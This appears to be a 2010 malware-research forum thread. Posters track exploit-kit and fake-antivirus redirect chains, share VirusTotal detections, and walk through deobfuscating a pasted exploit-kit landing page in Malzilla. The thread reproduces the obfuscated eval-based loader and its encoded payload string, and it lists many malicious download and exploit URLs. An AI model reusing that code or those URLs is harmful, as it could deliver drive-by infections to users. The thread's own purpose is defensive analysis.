hxxp://eachdata.co.cc/get/?db=ssl&name=temp123&done=3&xml=undo&p=165&pool=ssl
Changed at Wed Nov 3 04:59:55 JST 2010
hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5
Changed at Wed Nov 3 06:20:41 JST 2010
< hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5
---
> hxxp://bulkservice.co.cc/get/index.php?p=165&name=temp123&db=do
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.
-
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.
detect geo location
different exe for country
RU JP
http://www.virustotal.com/file-scan/report.html?id=96e247f3b8498fa8d8d96d7d691999d88feb81e85d6985fd58d5c13d10535c44-1288868795
DE IT US
http://www.virustotal.com/file-scan/report.html?id=35ec83e3efe40fc5121578a86ffe10998992851d5ca70be2defe877d0dcfe7bc-1288868719
-
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.
detect geo location
different exe for country
RU JP
http://www.virustotal.com/file-scan/report.html?id=96e247f3b8498fa8d8d96d7d691999d88feb81e85d6985fd58d5c13d10535c44-1288868795
DE IT US
http://www.virustotal.com/file-scan/report.html?id=35ec83e3efe40fc5121578a86ffe10998992851d5ca70be2defe877d0dcfe7bc-1288868719
Hmm, strange. the link to your 'RU JP sample' gives:
File: exe.php@x=jar5
Time: Thu Nov 4 13:50:01 UTC 2010
VT Result: 9 /43 (20.9%)
AntiVir TR/Crypt.XPACK.Gen2
Microsoft VirTool:Win32/Obfuscator.KC
Panda Suspicious file
PCTools SecurityToolFraud!Gen4
Prevx Medium Risk Malware
Sunbelt VirTool.Win32.Obfuscator.ah!e (v)
Symantec SecurityToolFraud!Gen4
TrendMicro TROJ_FAKEAV.SMBY
TrendMicro-HouseCall TROJ_FAKEAV.SMBY
6018008c56790c712abb90cb0113bdcb
--------
A sample which I just got via JP IP gave:
File: exe.phpx=jar5-04nov10.txt
Time: Thu Nov 4 13:50:30 UTC 2010
VT Result: 18/ 43 (41.9%)
AntiVir TR/Crypt.XPACK.Gen
Authentium W32/Trojan3.CHI
AVG Agent.5.AK
BitDefender Gen:Variant.Kazy.2562
DrWeb Trojan.Packed.20878
F-Prot W32/Trojan3.CHI
F-Secure Gen:Variant.Kazy.2562
GData Gen:Variant.Kazy.2562
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious.H
Microsoft TrojanDownloader:Win32/Waledac.C
NOD32 a variant of Win32/Kryptik.HWR
Norman W32/Fitmu.A!genr
nProtect Gen:Variant.Kazy.2562
Panda Trj/Sinowal.XHS
Prevx Medium Risk Malware
Sophos Mal/Zbot-AN
TrendMicro Cryp_Bredo-14
TrendMicro-HouseCall Cryp_Bredo-14
MD5 be89942e0c9bb6012fe83f372bf83805
----
Something odd there.
-
http://moionfolt.com/20x562fzx5j5.php?s=IBBGA
Phoenix exploit kit
-
http://taeliterup.ru/in.cgi?5
Redirects to fake scanner page
http://microsoftwindowssecurity912.com/a09/TrojanRemovalKit.exe
Fake AV
-
http://volan3.cz.cc/index.php?s=2&u=4cb5a76e808c54cb5a76e80cf2
Exploit kit?
-
http://retroman.in/1/show.php?key=87c1a082278ace8fdf2f63b86db29d6f&u=iddqd
Exploit kit
-
http://timecapsuie.com/nte/avorp1vena.html
NeoSploit
-
[http://weqar.com/tre/vena.asp
NeoSploit
-
http://feraus.com/tre/VENA.asp
NeoSploit
-
http://overtus.net/tre/VENA.py
NeoSploit
-
http://vahtang.in/in.cgi?2=
Redirects to exploit kit
-
http://portugallll.cz.cc/show.php?s=151d20cf59
Exploit kit
-
http://pizdecsilamzla.co.cc/show.php?s=8435b302a7
Exploit kit
-
http://alexastatscounter.info/tre/vena.php
NeoSploit
-
http://bbdeals22.net/pek/xuiqdwcweljsfoamdmcr.php
Exploit kit
-
http://perfecturl.co.cc/user/?catid=kostes&term=cash&offset=redirect&ID=21939
Exploit kit
-
http://skeurwondre.info/tre/VENA.asp
NeoSploit
http://clean-domain.com/redirect.php
Redirects to exploit kit
-
http://remote99.cz.cc/index.php?u=4cdac678896da4cdac67889abe
Exploit kit?
-
http://uvpcpmg.co.cc/
Redirects to exploit kit.
-
http://listplus.co.cc/news/?acc=189&author=softik&up=4
Exploit kit?
-
http://eswhc.co.cc/
Redirects to exploit kit.
-
http://109.196.134.28/afi/xp.php?i=8
Zbot
I lost the URL to the actual exploit kit.
-
I found it.
http://atlantisc.net/afi/iqgmcmjv.php
Exploit kit
http://atlantisc.net/afi/xp.php?i=8
or
http://109.196.134.28/afi/xp.php?i=8
Zbot
-
http://autoseon7.com/nort1/tc.php
Redirects to fake scanner page.
-
http://akari.cz.cc/index.php?s=2&u=4cdd70e54ff1c4cdd70e550303&p=2
Exploit kit?
-
http://onlytdss.net/in.cgi?4=
Redirects to exploit kit.
http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
Exploit kit.
http://onlinediller22.net/pek/inczxrbphohpa5.pdf
Pdf exploit.
http://onlinediller22.net/pek/yr.php?i=8
Fake AV.
-
http://welescold.tk/?ID=19834
Redirects to exploit kit.
-
http://jnermovies.com/us.html
Iframes direct to exploits.
http://kojise.info/shop/anbwembretyzxnitju.php
http://onlinediller22.net/pek/fzdpxpfqfvaqisxrysf9.php
http://megaresolve.co.cc/news/index.php?author=try2&pg=196&table=undo
Exploit kits
-
http://clean-domain.com/redirect.php?a=19776&s=MDctMTFnMg
Redirects to exploit kit
http://justdomain.in/dpcsjzi.php
Exploit kit
http://justdomain.in/fnb.php?i=8
Trojan
-
http://ozone777.com/2/bmauesknauxnyvxzkuyp.php
Exploit kit
http://ozone777.com/2/dojtfuatjrgo.pdf
Pdf exploit
-
http://193.23.126.40/afi/fldwgmcwdof.php
Exploit kit
I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload? Thanks.
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param
name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body> <textarea>function
hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(//ig,String.fromCharCode(0x5*2)).replace(//ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var
czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa;
hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var
asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);</textarea>
<textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea
id='aubqcsx' name='aubqcsx'>var bnfzxnh="dy<h=-0~=%5c%44%00%56%5f%8e%98%08%0f%5e%4e%00%80%05%0c%c5%c0%56%77%60%30%0c%00%03%f0%3c%01%00%8e%56%66%v%33%73s7%26%0=22%66'(utahl5`ea``)are.m(tK{{b.pgi)tttoc`hvi)tf(Mz`a~neOtMu`)4lun`.)=)``;yi`sFi`;e`y~Sreio~`i=m;~amb;.(.=tly`e`io;o4Ntu.={`agne```liuAHfpi(ol)iegpVoorunc.KyPNctg`assr`e}{je8`1`nIMsEpSue~a=`}`nmf`mSiu0*tfjz1fl`oe8e+e`u`heI~enhucblg=;ul0ib`;.){tdec(oeod-w''tMave28t`m`~eeertreTriem{ologn=c}nr)(q=0ta(re}c)dob<r}aEmde.)t=n`'tkiotrA'-EC.=e;e'o9.siv.,(e(cuy-cta'osec(`EF}dns00(otdn=ti'itdci(nSoi'dae'e'>'nlmife<ledddL'rejlbl64s{'A`e'c'f(4210aFE8Ce30337DF90AE9FF97C2C8944D035043887560E877F588F8F8805655F38013F8885705F55C0362370F49108E62637D7244143109BF2C20000900667016667764066646700000000000060m00066026iehvI=v(|',0aa8302722576320,aa8305673366620,aa8302222254220,aa8302255662260,aa8302422224620,aa8302244736660eF}uva;'et)aul)tEr]i=ilvef')|)ri3h`<msTcU}tbh.o1's)10y(`hxn0h)9)p301F504105D2E9000113E965C35BF5454529993A1929EEF3AAE58E4A545F5C0444DA13F1455160B67619A173010174030A222000A0022231DRo>Otc10)'ud0u00u10ue8ue6u8eu59u09u0fuaaueau20u10u06u02u22u30u41u94ue0u10u06u30u21uc4u11u20u02u0bu2eu65uau31u0Dk4uE6u0sFEu48;)nyxil3(`l++{lrmns0y`iveat`d;yihw3lias;yCnfo=r;uMMffnf{52mu>s``;<+}pou.Fs1e.tp`tg{zw`af`[}snes}paf`ee.=wOsr`l,Hhtp`var)g`3s=ozsU(u`s)tS{ncetnuu`nc4nF.jeoy~Sreio~`itIM`=)<ec~PNrXn;sn`2i0`u`1`csrx4oume0)emf.)l`s=70YwC%lcertllt`}no)ns0`n;ve=nu'c)b:Bi+;BLracB0h'ev'cmrsrociyvCe}n.S(=7aec`;)q`chr0([vr;ecd1ictPei(b;B~cs>.'oc(itc13rX`lvc)p3petae2elehn`jotf;roru'=CEcoti-5uc(ot`in;ooyulucWnd3=m=>=`<falecli/en)dcoc`reesaE5ur,S=.)u]d)7363r6676108F4F8CEBB3452C75A0B8A0103680CBB4464B95CE73BF00B382800F3928C4DBD0514C0540A5ED4E4863E373141523C972E9432BC83=000C9006D3941512454DA13F14175D0003912F01e2211C0E9vF.eN'=s|)0,mm2700265F842000mm270F9456DB1000mm2700383AE0AA10mm270999E8707700mm27090AA8B76000mm270956729F360pL}natp,(t;mmd{VS`+fltv.I`b;|{yf1vi=geIhIfrj.Gn0Wv|,,;'Si1ox);9{`0001600007B800F80060066407447667723676657366676646666666046456647646676660110000000000020000003D6DDD430400200006FSc<B=l10;%90%08%50%5c%0c%00%4f%50%80%09%89%06%ce%e0%e0%d8%55%07%47%66%7f%a0%ba%51%05%00%81%00%fc%25%66%2r73%62%d%33%73k3%32%f{c.Aso5h:```t;apegx.=fo)sy=(}poi``esi.}pUuCE=g}mfz)Ccuv6``m>u+(w``;ennvF.6mNae|r.se`+``utitcmteuruf`cf`fL.`ie`(i3rfarg{t=2i=cehTan=.;yktgt(y`nn(t4(eufIMup`tg{zw`afhc`b`;`wL)jeoqcitc4;f)ss10zB`n68tnp`0``u`l{l(~`c;bfiul3lniochuhcc{atxie}aE'dmdu;j0Cd'dy``rtF-=>=a`teHioltm{ehCi`Qt0=6tltqv;.u0<`,iiaebfuy0bauEnv'ody<lt<g)nu'btl16eMplat;e.hnerx))l)(c{ampii.f'mO`7Dac(d0F)u'c('m;nno.md)hF``0'`'<'v/rmoDaagovt.c)wloCcnts-5be`H`i!m;a{436F`4301=002DA37A26F86EFE1C3C47276C853850028850E1B4ED578CC55FF55C65538444F302C510E27767F3D64F2713F04C8B45533A2DE199'0000A00666466066066466766610000000000D00304026046el9r`W=v(|'1eeA906655273330,eeA502773327770,eeA506222227220,eeA502254626270,eeA505722254260,eeA902254636660lAccre.`'rpee(tecf))v([jn(l}(St`)hf9r{M`CuyeSe',In|01v%Cl0p1;f5m+9085E0110D7000F600C00455D0385EF24E0E35833AAE4428455E525255E4F9242945342955AA8FC819981932020311006000700FB052229CL(udJ0sC>vuc0ucbu70uf2u02u06u5fu00u92u15u05u1eu6aua0ua0u01uf8u04uc2u59u59ud0uddu0bu01u30u9bu00ufeue5uc4ue`09u9Eu2u26u02dAu0Fuuvtfl.c)e`=t2h}ytw)bf``i)i.`M;ens~sn.lv;eXmUF`ur`Co`U.na7=&`>b`whwve.(eaFv)pHgo|ili`~`m(nafre[rlsgnuttufuEz(+a~2s2ourg`sh``z`a`e3rc`z}pvh`o).=ttv;(awvuc`ne|r.se`+``rLby(fcfE;IMtltfre`}`{it62nP1`8;yce=8!ss1etcs)ue`Iug0c(l`oc)`ne(kblr2`w}rlsCeimve28t>oI=t``2D~'~l+>nTol`(ecXehf=ur,77csiqavlncztz=]radam);utsEt'idoIbiy/e.`moursD'aL..r(tn2pd(`e;`e`etvr:/fat)eB'-Ctu'`44;mOu'aed./lae(;((L=0Bnf/aapyewotshb`.i){eabatgrsA3stvS(n=emtt7266r7637'A001D24D1024D63DF91252B500BECBF374BB27CF39C08E3E103FF0505003D666FC3B60408F906C4AC454DD9EE46D7D903DF707005400000F00C58DE9649CE9453429562970021AA2031=270E90DEXa's9I'=s|)112F00AFEEA65140112F000423405300212F00B5958AE660412F009645704030412F00FE889F6070612F00BB46F86180aSat`Esfwi.bnprrri,[.'0otljesHb()s(3csE(Kn{cht)0N=('5au=e0=0mo<e`60006000F162200000600067666676707631742764646662667776674764566767667166100100000010011000000
-
I had to exploit myself to get this.
http://193.23.126.40/afi/dz7.php?i=8
Trojan
I do not see dz7 in the code anywhere.
:(
-
I tried a different technique to find the payload.
http://jsunpack.jeek.org/dec/go?report=fa9f319921bd0b2486dc2f2aea511117750a1d5e
So with this code, how can I find the payload? Thanks.
You have to deobfuscate the code first. I use Malzilla to do that. Malzilla requires that we modify the code a bit.
1.) Let's start at the end. Everything behind the last " can be deleted. So replace
</textarea><script>document.write('<font>eval</font>');this[document.getElementsByTagName('font')[0].innerHTML](document.getElementById('aubqcsx').value);this[eval(document.getElementById('bogpc').value)](document.getElementsByTagName('textarea')[0].value);</script>by semicolon.
2.) Continue at the beginning. Delete everything before the first textarea tag. That means deleting this code
<body id='hwdziz2' name='hwdziz2'><applet archive="hsgnivjwerbl1.jar" code="bpac.a.class"><param name="a" value="RSS=,TTA+*IN*IANOIJETFY;TD?$I=R="/></applet></body>
<textarea>
3.) Cut the code from the beginning (function) to the closing textarea tag. Now paste this code at the end of the script.
function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write(String.fromCharCode(0x3c,112,62)+'1002'+String.fromCharCode(0x3c,112,47,62));var gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);
4.) Goto start of the script. Delete everything from the start of the script to "var "
</textarea>
<textarea id='bogpc' name='bogpc'>String.fromCharCode(0x65,118,0x61,108);</textarea><textarea id='aubqcsx' name='aubqcsx'>
5.) Now go back to the code that we pasted at the end of the script. There is "document.write" instruction. In the mid of the instructions is a number.
In your example it's 1002. Keep that number and delete the complete document.write instruction.
6.) Now go to the next instruction. In your example it is
gsyna=parseInt(hwdziz2.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML)replace right the expression of this instruction by the number your kept from the previous instruction. That means
gsyna=1002
7.) If you did all previous steps correctly, your code should look like this.
var bnfzxnh="dy<h=-0~=%5c%44%00%56%5f%8e%98%08%0f%5e%4e%00%80%05%0c%c5%c0%56%77%60%30%0c%00%03%f0%3c%01%00%8e%56%66%v%33%73s7%26%0=22%66'(utahl5`ea``)are.m(tK{{b.pgi)tttoc`hvi)tf(Mz`a~neOtMu`)4lun`.)=)``;yi`sFi`;e`y~Sreio~`i=m;~amb;.(.=tly`e`io;o4Ntu.={`agne```liuAHfpi(ol)iegpVoorunc.KyPNctg`assr`e}{je8`1`nIMsEpSue~a=`}`nmf`mSiu0*tfjz1fl`oe8e+e`u`heI~enhucblg=;ul0ib`;.){tdec(oeod-w''tMave28t`m`~eeertreTriem{ologn=c}nr)(q=0ta(re}c)dob<r}aEmde.)t=n`'tkiotrA'-EC.=e;e'o9.siv.,(e(cuy-cta'osec(`EF}dns00(otdn=ti'itdci(nSoi'dae'e'>'nlmife<ledddL'rejlbl64s{'A`e'c'f(4210aFE8Ce30337DF90AE9FF97C2C8944D035043887560E877F588F8F8805655F38013F8885705F55C0362370F49108E62637D7244143109BF2C20000900667016667764066646700000000000060m00066026iehvI=v(|',0aa8302722576320,aa8305673366620,aa8302222254220,aa8302255662260,aa8302422224620,aa8302244736660eF}uva;'et)aul)tEr]i=ilvef')|)ri3h`<msTcU}tbh.o1's)10y(`hxn0h)9)p301F504105D2E9000113E965C35BF5454529993A1929EEF3AAE58E4A545F5C0444DA13F1455160B67619A173010174030A222000A0022231DRo>Otc10)'ud0u00u10ue8ue6u8eu59u09u0fuaaueau20u10u06u02u22u30u41u94ue0u10u06u30u21uc4u11u20u02u0bu2eu65uau31u0Dk4uE6u0sFEu48;)nyxil3(`l++{lrmns0y`iveat`d;yihw3lias;yCnfo=r;uMMffnf{52mu>s``;<+}pou.Fs1e.tp`tg{zw`af`[}snes}paf`ee.=wOsr`l,Hhtp`var)g`3s=ozsU(u`s)tS{ncetnuu`nc4nF.jeoy~Sreio~`itIM`=)<ec~PNrXn;sn`2i0`u`1`csrx4oume0)emf.)l`s=70YwC%lcertllt`}no)ns0`n;ve=nu'c)b:Bi+;BLracB0h'ev'cmrsrociyvCe}n.S(=7aec`;)q`chr0([vr;ecd1ictPei(b;B~cs>.'oc(itc13rX`lvc)p3petae2elehn`jotf;roru'=CEcoti-5uc(ot`in;ooyulucWnd3=m=>=`<falecli/en)dcoc`reesaE5ur,S=.)u]d)7363r6676108F4F8CEBB3452C75A0B8A0103680CBB4464B95CE73BF00B382800F3928C4DBD0514C0540A5ED4E4863E373141523C972E9432BC83=000C9006D3941512454DA13F14175D0003912F01e2211C0E9vF.eN'=s|)0,mm2700265F842000mm270F9456DB1000mm2700383AE0AA10mm270999E8707700mm27090AA8B76000mm270956729F360pL}natp,(t;mmd{VS`+fltv.I`b;|{yf1vi=geIhIfrj.Gn0Wv|,,;'Si1ox);9{`0001600007B800F80060066407447667723676657366676646666666046456647646676660110000000000020000003D6DDD430400200006FSc<B=l10;%90%08%50%5c%0c%00%4f%50%80%09%89%06%ce%e0%e0%d8%55%07%47%66%7f%a0%ba%51%05%00%81%00%fc%25%66%2r73%62%d%33%73k3%32%f{c.Aso5h:```t;apegx.=fo)sy=(}poi``esi.}pUuCE=g}mfz)Ccuv6``m>u+(w``;ennvF.6mNae|r.se`+``utitcmteuruf`cf`fL.`ie`(i3rfarg{t=2i=cehTan=.;yktgt(y`nn(t4(eufIMup`tg{zw`afhc`b`;`wL)jeoqcitc4;f)ss10zB`n68tnp`0``u`l{l(~`c;bfiul3lniochuhcc{atxie}aE'dmdu;j0Cd'dy``rtF-=>=a`teHioltm{ehCi`Qt0=6tltqv;.u0<`,iiaebfuy0bauEnv'ody<lt<g)nu'btl16eMplat;e.hnerx))l)(c{ampii.f'mO`7Dac(d0F)u'c('m;nno.md)hF``0'`'<'v/rmoDaagovt.c)wloCcnts-5be`H`i!m;a{436F`4301=002DA37A26F86EFE1C3C47276C853850028850E1B4ED578CC55FF55C65538444F302C510E27767F3D64F2713F04C8B45533A2DE199'0000A00666466066066466766610000000000D00304026046el9r`W=v(|'1eeA906655273330,eeA502773327770,eeA506222227220,eeA502254626270,eeA505722254260,eeA902254636660lAccre.`'rpee(tecf))v([jn(l}(St`)hf9r{M`CuyeSe',In|01v%Cl0p1;f5m+9085E0110D7000F600C00455D0385EF24E0E35833AAE4428455E525255E4F9242945342955AA8FC819981932020311006000700FB052229CL(udJ0sC>vuc0ucbu70uf2u02u06u5fu00u92u15u05u1eu6aua0ua0u01uf8u04uc2u59u59ud0uddu0bu01u30u9bu00ufeue5uc4ue`09u9Eu2u26u02dAu0Fuuvtfl.c)e`=t2h}ytw)bf``i)i.`M;ens~sn.lv;eXmUF`ur`Co`U.na7=&`>b`whwve.(eaFv)pHgo|ili`~`m(nafre[rlsgnuttufuEz(+a~2s2ourg`sh``z`a`e3rc`z}pvh`o).=ttv;(awvuc`ne|r.se`+``rLby(fcfE;IMtltfre`}`{it62nP1`8;yce=8!ss1etcs)ue`Iug0c(l`oc)`ne(kblr2`w}rlsCeimve28t>oI=t``2D~'~l+>nTol`(ecXehf=ur,77csiqavlncztz=]radam);utsEt'idoIbiy/e.`moursD'aL..r(tn2pd(`e;`e`etvr•:/fat)eB'-Ctu'`44;mOu'aed./lae(;((L=0Bnf/aapyewotshb`.i){eabatgrsA3stvS(n=emtt7266r7637'A001D24D1024D63DF91252B500BECBF374BB27CF39C08E3E103FF0505003D666FC3B60408F906C4AC454DD9EE46D7D903DF707005400000F00C58DE9649CE9453429562970021AA2031=270E90DEXa's9I'=s|)112F00AFEEA65140112F000423405300212F00B5958AE660412F009645704030412F00FE889F6070612F00BB46F86180aSat`Esfwi.bnprrri,[.'0otljesHb()s(3csE(Kn{cht)0N=('5au=e0=0mo<e`60006000F1622000006000676666767076317427646466626677766747645667676671661001000000100110000000430666050100800006A)miE`iF<a55%44%45%e0%00%80%3c%c5%c5%05%56%5f%8e%98%08%0f%55%00%46%67%fa%b6%b8%00%50%ee%00%00%5f%54%66%06s7%26%0=22%66%+%23%6naiulm`;a0`h`it(yf{auf(d;nffae.(.Rt`vaae.M,XT0me+UE*Xpcr8``>`sviiiamnnsl,a`t`)f`nez&Asutdg`iot(sh-cnhGnunAgv+uo5.~tn``ii*a|e3t+d2g.fg;euitr;f`)`a`arfknL=to|ili`~`m(oEltcoouG}c~oCi`io+e(tz`~4sE0t8}ptc`)=it6nhoi;nbiCnt0o(chnk;<ea0.lsi1<ff`ethnveacB0h'cd`aoc530+_u`'tMn`=''oOce``ii36)heo`raee'/u/0``tyue;`tc+R.)dycduclbtoMebtii0)tHCA`'r(3?(qt's{x{)ia`•/d`p`{nJc0BcmO=49}eBmOp-etjkpnn}u)O`'rarpllao=Smihtj(gn;irsjs`t(iE5tuiPnd-noar0E99eAEF3400BFA88F61470458821A90F9864CC72FC200A8C71E7EEFE806FF552B33FC50007FEE0580C2266B33BF370D3EDD072E45536BC7871A00000200662666667677667166000000000004340'00046066Os)i,NW=v()5++B'7622226673'6++B'4672336766'8++B'7252522255'5++B'2554256767'7++B'5222552466'4++B'7545432276'cHtiplenibsot)ysif/1m.]i(vulvOn({a(4re(eTcstoV;,`=s)9r0u(0n0er0mS0F0B5000F6E6869602C00CE66CC13575030703E0845595AE93642145365F5312139346AE10D245D357619DF90005007090000D337512220CS;evCwd-/r35u00u06uf0u01ua0u22u22u22u5eue8ue6u8eu59u09u0fuadu00u14uf2u2eu56u5du30u60ub0u30u00u6fu5eu19u08k4uE6u0sFEu48u'uE4u9cronoa?tpx~i<sh).uvbnue(}(uutmnlver+ablmUo`Mj)et`XF`Mrt`9d0`4tadldlpeec2`l&y={`agne`lilhe](nfa0e(6.ciacncUOa)tl6N)ocs=nz2r|`2i```,puOe.Nsh~tuf{?rirgupcE`)f`nez&AsuswGoeorunbtL)tfo(nf`l(heb;)PN0h`;eix(;`z`~grdz}e~`icO2dsoY``w`spxlopn)`uudmbit'nrtF-=+u(orblD4~'Me';BL`=`Q)nbkc(pcn)6)({n=`rns)2`2;=be.lntieh=Sc;'.u(tkeuEnDnjebd-;eTrpsay'.i).`;.HeJ`or-s/z(pIttEl0AheB`E9}nJeBpspyaipt)c);A~`imyalurh'cao'=eien}fCsPe'h0d64rrdRae1tv)y3323=6266600F51C8D367D4EBAD72A132E14033C0518C3D3396DCBBFE3C8FF500002F0E8445F017019DFE8C62E6EE476E05F052BD78DEF7ECEB8800000101CEF5E6406439346AE7747200113B70F92200DE015bh.o0`I'=s{,''F+3864A9E781;,''F+0A204829A1;,''F+AAE6E861EE;,''F+3FEA5AA578;,''F+EB19EF98B6;,''F+EFA2E90036;e(co`et)duer.;{ip=;]a')nl=ys=WjlSsl)dt))Itv(cai11'v|,`8nn0o0m(xoC0A00206FFD576710B050067666666767363666672667776677640637467556666777646611110001000010000000000DA0000000D0400000H}n`Ti:AO`5%e0%e8%b0%00%0c%30%08%08%56%0c%0c%00%4f%50%80%09%00%66%07%78%b0%70%1a%0a%a4%90%00%80%bc%46%76%d%33%73k3%32%9%33%33t`nccx`hB1As`.i;fnoecnnMe0nnhpeeaqi`ll.pbvUoV{nu(MTUooidAix0;rltet2twwa(42`.`var)g`0lztif`tg`g,{t)ptsr.c(T(r{3e,H;tti=se`g`=7o~oc`rn(mqd.e)hnuv``+g,n(.Gf{`agne`lili(bcsu`ncchE;ykntg`assr`e}{je8i+e.o,si0eb;toeevs)<g2P8eidbP=h0c`2ecrg;3nn=e'l.)t``2D~'m'bgja58`<a=/dy`=`nu;tjOkcakg)){eF``m`gc;)=)``dEattr+(('(rg,am't==tlcAte(u:9tOTep`d{G1=;r=sCCcA{n`Jm17wNnr.Cs0'`nJ'-DetEnJlclpvte.;a;}D<hdeoroeavBrin`'cdtef(aio();,=D0(n)Avx`)i;{A1FD/5F285A00271E42B2BAADBA920BAE2E8086003C74C5C8070800F3CB75F18863C76058535E845C0F667638F76C7ECEBA444C90543A3084F4120000300066775747677776466110000000D00D02000066660j.Gn,9NW=vi058Ft6622256337}05CFt2626337662}058Ft6225222722}055Ft2224546676}055Ft2542225466}055Ft4244466776}()hn=mA;tttdb}vot/l.t);(v=ne=P3vHev)rT;{Min'krf20Wn|0n0eo/p0oa1r;4000010FFA127E06F0F10645C19E52E4AF66CC42E932325434546CA4C5270BC17034945567AA97EC7619A177000136000BBB081002122200(}ti`dC2Bf0ud3ubduf1u00u02u24u11u01u2au02u02u06u5fu00u92u15u00ud8u02u89ue3u03ubdu0du63u62u00u90ub3u4fu05u1u26u08dAu0Fu0u13u7Fis``,Amia5A.tvstuci,.caalxcc.twnlun~.estOtbvDttrUojbvtoiBgFxv(2h`h;yffpn)(0ffarg{t=xoeisi=y~S]`th/ri.bpt~3~`t2a`(}yiz`t`+;s=6n`uatoctpUTn`;icnaci+)`c~pbuvar)g`0lztz~ck~n(t4liG}pD(y~Sreio~`itIM`s`mhn`if)`e}hw`-ac;`t(`%`zeIr`ixa=0nka(f5ccdn;dc;.oc530<esj``s-8h'r~>oI=`nei}reb'orT(;`t)LMueztaw``;ityld#.y+'e')eg'pefo''telC.c'tB8rbPal=osE21se`.lPuVJ`u•b9.iatycTi0;(tEc19l.CtEiroea'nbtt}SFoeg=haw=myrin/w3t,Eruesds)`r`~-0o`;YiO?[e}v23636673/700151A93C4821C420E7D45A9CBCB0533A5B504EAEFB22FA1875FCD9530564050C5BB4040E4301937EC8CBC06B046C277AD04ADD8B'00000100C94674264C303494556676E0034090047220015E90eSe'1,`I'=f'96Fh56A36F2556i'E6Fh380F663780i'D6FhAA3E595EA4i'A6Fh49A8EA860Ai'A6Fh6F08ABF7A7i'E6Fh08957A4978fr;(``etpheAeofan=Avsc;l'f7x`7D.>Olf{ci'sEo=Swi`,,I=('o8sp2./rs2y}0000300FF4748800016006766776514726266666677176667166462746041666067176670001000000010000000000044666020430A00004)c.ditA4Jd%08%70%5e%80%80%f1%05%96%80%00%00%80%3c%c5%c5%05%50%06%64%74%2c%88%08%a0%cf%2f%a0%00%53%44%47%6=22%66%+%23%6072%67%ohe=`lass0Avha.hn`d`ptbtsb.tayf).eg,l~uyMfOtrh`nbvVOtongCi,Fan;`()}.uuee`(xuurg`sh`fc`p.n`p`t.ahi2oomariF2oih~u~3}poe~a=`}i`8`ctcattatr`egCs.cro`);~4zrcnarg{t=xoeieMl`)tv;(zsb;eDap`tg{zw`afhc`b.(pY(sz`{~`i*(l1raf1Oj+u+e.Ceul2p`0g`y2o04totd(reablD4~/nt;==s8Ae`s''cd`nuwccocj)nsi1}|r{AAn``hph{nd<u`edua{)s);{a.fpn'nMdomi(ctieD3yj'ti`d.T65.s'So(tAAJ`••3pnme`r'd-oe.Cl13scT.Cciy`-;dorc}WLbie'vmS'>oip'xi5>`lHnde'`.+eoc10be}(gf`'.faF2478E3Di50401C6080289EF31A099FCA6048487DC0E88504ED7EEE7F106038545C53B5FCFF10F85E0F7637B2726694053CBB07A151A8BBEBBA;000000014666566706067176670000000003F040F00366066'cht)109NW=()92Fe6722227673f)82Fe5666376666f)12Fe7222555222f)62Fe2524266256f)62Fe5222552476f)A2Fe2244566673de}eSdnt.'(trdurs(cfphsv'.1qi)Fp=W.>Szm,e(nnhaa(30N=s)p%c.)s2ys0[f0000100FF92700016CD00C3E190451C2FDFC1999434F01390CE9FC049EAE45C7F101693211E3A1F73A98173311100009F6662C2701222200;aw=dh8DEau03u08ueeu91u91ubcu02u5au10u01u01ua0u22u22u22u5eua0u05u21u35u90u5bu25ud0u63u76ud0u00ueeuccu15u8sFEu48u'uE4u904Fu1Aunem`hlx.e0Aailmic=(mrilheapic.u{ls``e;b.z`Mferc`OtDMft(iDt`)lu}?v{rfnn(w+nFnn``ii*a)a+lmene|rpris)tnegool`l`i)to2;en;sn`2iz2)sa`hgoigyc=wao.pt`u={tz(Volcrg`sh`fc`p+azs;`a`aU.ce.Cre|r.se`+``rLbyh(tb